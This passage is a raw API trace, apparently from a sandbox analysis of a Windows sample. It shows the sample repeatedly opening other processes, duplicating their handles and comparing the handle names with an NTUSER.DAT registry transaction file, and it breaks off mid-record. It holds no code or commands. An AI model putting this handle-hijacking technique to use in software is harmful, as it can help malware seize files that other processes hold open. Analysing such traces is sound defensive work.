[0165.157] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.158] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.158] CloseHandle (hObject=0x1e4) returned 1 [0165.158] CloseHandle (hObject=0x194) returned 1 [0165.158] CloseHandle (hObject=0x1e8) returned 1 [0165.158] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0165.158] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.158] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.159] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.160] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.160] CloseHandle (hObject=0x1e4) returned 1 [0165.160] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0165.160] CloseHandle (hObject=0x194) returned 1 [0165.160] CloseHandle (hObject=0x1e8) returned 1 [0165.160] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0165.160] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.160] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.161] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.162] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.162] CloseHandle (hObject=0x1e4) returned 1 [0165.162] CloseHandle (hObject=0x194) returned 1 [0165.162] CloseHandle (hObject=0x1e8) returned 1 [0165.162] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0165.162] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x11c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.162] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.163] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.163] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.163] CloseHandle (hObject=0x1e4) returned 1 [0165.164] _wcsicmp (_Str1="\\RacMetaData.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 4 [0165.164] CloseHandle (hObject=0x194) returned 1 [0165.164] CloseHandle (hObject=0x1e8) returned 1 [0165.164] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0165.164] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x130, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.164] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.165] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.165] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.165] CloseHandle (hObject=0x1e4) returned 1 [0165.166] _wcsicmp (_Str1="\\RacDatabase.sdf", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 4 [0165.166] CloseHandle (hObject=0x194) returned 1 [0165.166] CloseHandle (hObject=0x1e8) returned 1 [0165.166] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0165.166] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x160, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.166] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.166] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.167] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.167] CloseHandle (hObject=0x1e4) returned 1 [0165.167] _wcsicmp (_Str1="\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0165.167] CloseHandle (hObject=0x194) returned 1 [0165.167] CloseHandle (hObject=0x1e8) returned 1 [0165.168] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0165.168] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.168] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.168] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.169] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.169] CloseHandle (hObject=0x1e4) returned 1 [0165.169] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -3 [0165.169] CloseHandle (hObject=0x194) returned 1 [0165.169] CloseHandle (hObject=0x1e8) returned 1 [0165.170] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0165.170] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1b8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.170] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.170] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.171] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.171] CloseHandle (hObject=0x1e4) returned 1 [0165.171] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0165.171] CloseHandle (hObject=0x194) returned 1 [0165.171] CloseHandle (hObject=0x1e8) returned 1 [0165.171] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0165.171] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.171] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.172] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.173] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.173] CloseHandle (hObject=0x1e4) returned 1 [0165.173] _wcsicmp (_Str1="\\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0165.173] CloseHandle (hObject=0x194) returned 1 [0165.173] CloseHandle (hObject=0x1e8) returned 1 [0165.174] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0165.174] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2e4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.174] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.174] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.175] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.175] CloseHandle (hObject=0x1e4) returned 1 [0165.175] _wcsicmp (_Str1="\\WinSATAPI.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0165.175] CloseHandle (hObject=0x194) returned 1 [0165.176] CloseHandle (hObject=0x1e8) returned 1 [0165.176] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0165.176] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x334, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.176] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.176] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.177] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.177] CloseHandle (hObject=0x1e4) returned 1 [0165.177] _wcsicmp (_Str1="\\RacWmiDatabase.sdf", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 4 [0165.177] CloseHandle (hObject=0x194) returned 1 [0165.177] CloseHandle (hObject=0x1e8) returned 1 [0165.177] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0165.178] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x34c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.178] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.178] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.179] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.179] CloseHandle (hObject=0x1e4) returned 1 [0165.179] _wcsicmp (_Str1="\\sql96F1.tmp", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0165.179] CloseHandle (hObject=0x194) returned 1 [0165.180] CloseHandle (hObject=0x1e8) returned 1 [0165.180] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0165.180] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x370, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.180] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.181] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.182] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.182] CloseHandle (hObject=0x1e4) returned 1 [0165.182] _wcsicmp (_Str1="\\sql9702.tmp", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0165.182] CloseHandle (hObject=0x194) returned 1 [0165.182] CloseHandle (hObject=0x1e8) returned 1 [0165.182] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8b8) returned 0x1e8 [0165.182] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.182] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.186] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.190] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.190] CloseHandle (hObject=0x1e4) returned 1 [0165.190] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0165.190] CloseHandle (hObject=0x194) returned 1 [0165.191] CloseHandle (hObject=0x1e8) returned 1 [0165.191] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8b8) returned 0x1e8 [0165.191] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.191] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.192] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.193] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.193] CloseHandle (hObject=0x1e4) returned 1 [0165.193] CloseHandle (hObject=0x194) returned 1 [0165.193] CloseHandle (hObject=0x1e8) returned 1 [0165.193] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8b8) returned 0x1e8 [0165.193] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.193] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.194] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.195] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.195] CloseHandle (hObject=0x1e4) returned 1 [0165.195] _wcsicmp (_Str1="\\Fonts", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -8 [0165.195] CloseHandle (hObject=0x194) returned 1 [0165.196] CloseHandle (hObject=0x1e8) returned 1 [0165.196] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8b8) returned 0x1e8 [0165.196] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x130, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.196] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.197] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.198] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.198] CloseHandle (hObject=0x1e4) returned 1 [0165.198] _wcsicmp (_Str1="\\EQUATION", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -9 [0165.198] CloseHandle (hObject=0x194) returned 1 [0165.199] CloseHandle (hObject=0x1e8) returned 1 [0165.199] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x938) returned 0x1e8 [0165.199] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.199] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.200] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.201] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.202] CloseHandle (hObject=0x1e4) returned 1 [0165.202] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0165.202] CloseHandle (hObject=0x194) returned 1 [0165.202] CloseHandle (hObject=0x1e8) returned 1 [0165.202] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x938) returned 0x1e8 [0165.202] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x74, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.202] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.203] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.204] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.204] CloseHandle (hObject=0x1e4) returned 1 [0165.204] CloseHandle (hObject=0x194) returned 1 [0165.204] CloseHandle (hObject=0x1e8) returned 1 [0165.204] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x938) returned 0x1e8 [0165.204] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x148, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.204] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.205] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.206] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.206] CloseHandle (hObject=0x1e4) returned 1 [0165.206] CloseHandle (hObject=0x194) returned 1 [0165.206] CloseHandle (hObject=0x1e8) returned 1 [0165.206] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x938) returned 0x1e8 [0165.206] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x198, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.206] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.207] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.208] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.208] CloseHandle (hObject=0x1e4) returned 1 [0165.208] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0165.208] CloseHandle (hObject=0x194) returned 1 [0165.208] CloseHandle (hObject=0x1e8) returned 1 [0165.208] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x938) returned 0x1e8 [0165.208] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1ac, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.208] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.209] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x102 [0165.463] TerminateThread (hThread=0x1e4, dwExitCode=0x0) returned 1 [0165.463] CloseHandle (hObject=0x1e4) returned 1 [0165.463] CloseHandle (hObject=0x194) returned 1 [0165.463] CloseHandle (hObject=0x1e8) returned 1 [0165.463] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x998) returned 0x1e8 [0165.463] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.463] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.464] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.465] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.465] CloseHandle (hObject=0x1e4) returned 1 [0165.465] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0165.465] CloseHandle (hObject=0x194) returned 1 [0165.465] CloseHandle (hObject=0x1e8) returned 1 [0165.465] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x998) returned 0x1e8 [0165.465] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x60, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.466] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.466] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.467] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.467] CloseHandle (hObject=0x1e4) returned 1 [0165.468] CloseHandle (hObject=0x194) returned 1 [0165.468] CloseHandle (hObject=0x1e8) returned 1 [0165.468] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x998) returned 0x1e8 [0165.468] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x154, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.468] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.468] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.469] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.469] CloseHandle (hObject=0x1e4) returned 1 [0165.469] _wcsicmp (_Str1="\\MPLog-07132009-221054.log", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0165.469] CloseHandle (hObject=0x194) returned 1 [0165.469] CloseHandle (hObject=0x1e8) returned 1 [0165.469] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x998) returned 0x1e8 [0165.469] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x270, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.469] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.470] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.471] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.471] CloseHandle (hObject=0x1e4) returned 1 [0165.471] CloseHandle (hObject=0x194) returned 1 [0165.471] CloseHandle (hObject=0x1e8) returned 1 [0165.471] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x998) returned 0x1e8 [0165.471] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x390, hTargetProcessHandle=0xffffffff, 